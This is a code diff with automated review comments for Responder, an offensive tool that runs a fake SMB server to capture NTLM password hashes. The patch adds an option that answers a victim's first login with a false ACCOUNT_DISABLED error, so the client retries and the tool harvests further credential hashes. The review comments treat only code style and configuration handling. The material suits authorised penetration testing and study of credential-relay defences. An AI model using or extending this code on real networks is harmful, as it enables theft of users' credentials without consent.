diff --git a/Responder.conf b/Responder.conf
index dc86a48..4303df6 100644
--- a/Responder.conf
+++ b/Responder.conf
@@ -49,6 +49,11 @@ DontRespondToName =
 ; if a hash hash been previously captured for this host.
 AutoIgnoreAfterSuccess = Off
+; If set to On, we will send ACCOUNT_DISABLED when the client tries
+; to authenticate for the first time to try to get different credentials.
+; This may break file serving and is useful only for hash capture
+CaptureMultipleCredentials = Off
+
 [HTTP Server]
 ; Set to On to always serve the custom EXE
diff --git a/servers/SMB.py b/servers/SMB.py
index 6127eca..0f89553 100644
--- a/servers/SMB.py
+++ b/servers/SMB.py
@@ -182,6 +182,7 @@ def IsNT4ClearTxt(data, client):
 class SMB1(BaseRequestHandler): # SMB Server class, NTLMSSP
 def handle(self):
 try:
+ self.ntry = 0
 while True:
 data = self.request.recv(1024)
 self.request.settimeout(1)
@@ -213,7 +214,10 @@ class SMB1(BaseRequestHandler): # SMB Server class, NTLMSSP
 # STATUS_MORE_PROCESSING_REQUIRED
 Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
- Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
+ if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
+ Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
+ else:
+ Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
 Body.calculate()
 Packet = str(Header)+str(Body)
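Review bot: In the STATUS_MORE_PROCESSING_REQUIRED hunk the two SMBSession1Data calls differ only by the `NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH"` keyword, and nothing says why the AV-pair target string is replaced on the first attempt only, so the constant reads as magic. Build the keyword arguments once and put the reason on the branch, e.g. `# First attempt with CaptureMultipleCredentials: send a non-default AV-pair target name (see Responder.conf)`; what the client is expected to do with that value is not visible here, so state it only if it is documented elsewhere. `self.ntry` is initialised at the top of handle() in the earlier hunk, so the counter is per connection, which is what the `== 0` test needs; handle() itself starts and ends outside both hunks.
```python
				# STATUS_MORE_PROCESSING_REQUIRED
				# … unchanged: SMBHeader construction …
				# First attempt with CaptureMultipleCredentials: send a non-default
				# AV-pair target name (see Responder.conf); later attempts use the default.
				session_kwargs = {"NTLMSSPNtServerChallenge": settings.Config.Challenge}
				if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
					session_kwargs["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = "NOMATCH"
				Body = SMBSession1Data(**session_kwargs)
				Body.calculate()
```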
@@ -237,6 +241,18 @@ class SMB1(BaseRequestHandler): # SMB Server class, NTLMSSP
 # Parse NTLMSSP_AUTH packet
 ParseSMBHash(data,self.client_address[0])
+ if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
+ # Send ACCOUNT_DISABLED to get multiple hashes if there are any
+ Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+ Body = SMBSessEmpty()
+
+ Packet = str(Header)+str(Body)
+ Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+
+ self.request.send(Buffer)
+ self.ntry += 1
+ continue
+
 # Send STATUS_SUCCESS
 Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
 Body = SMBSession2Accept()
@@ -341,4 +357,4 @@ class SMB1LM(BaseRequestHandler): # SMB Server class, old version
 data = self.request.recv(1024)
 except Exception:
 self.request.close()
- pass
\ No newline at end of file
+ pass
diff --git a/settings.py b/settings.py
index b894dab..444a4fd 100644
--- a/settings.py
+++ b/settings.py
@@ -146,8 +146,9 @@ class Settings:
 self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])
 # Auto Ignore List
- self.AutoIgnore = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
- self.AutoIgnoreList = []
+ self.AutoIgnore = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
+ self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
+ self.AutoIgnoreList = []
 # CLI options
 self.LM_On_Off = options.LM_On_Off
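Review bot: In the ACCOUNT_DISABLED branch `Buffer = struct.pack(">i", len(''.join(Packet)))+Packet` joins a string into itself: Packet is already `str(Header)+str(Body)`, so `''.join(Packet)` rebuilds the same value character by character and `len(Packet)` gives the same length and reads as what it is. The `###should always send errorcode=... account disabled for anonymous logins.` remark is glued to the end of the SMBHeader line; move it to its own comment line above the header, next to the existing `# Send ACCOUNT_DISABLED ...` line, so the long constructor call stays readable and the status code and its name sit together. `continue` skips the STATUS_SUCCESS reply and returns to the recv() at the top of the while loop for the client's next attempt; the loop and handle() continue outside the hunk.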
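Review bot: `config.get('Responder Core', 'CaptureMultipleCredentials')` in the settings.py hunk has no fallback, so an existing Responder.conf that predates this option makes Settings raise NoOptionError and Responder does not start until the conf change is merged; the neighbouring reads use the same unguarded pattern, but their keys already exist in shipped conf files. Guard the new key so a missing entry means Off: `self.CaptureMultipleCredentials = config.has_option('Responder Core', 'CaptureMultipleCredentials') and self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))`. The AutoIgnore and AutoIgnoreList lines are removed and re-added with no visible text change, which suggests an indentation change; since this is Python, confirm the re-added lines use the same indent character as the rest of __init__, which continues outside the hunk.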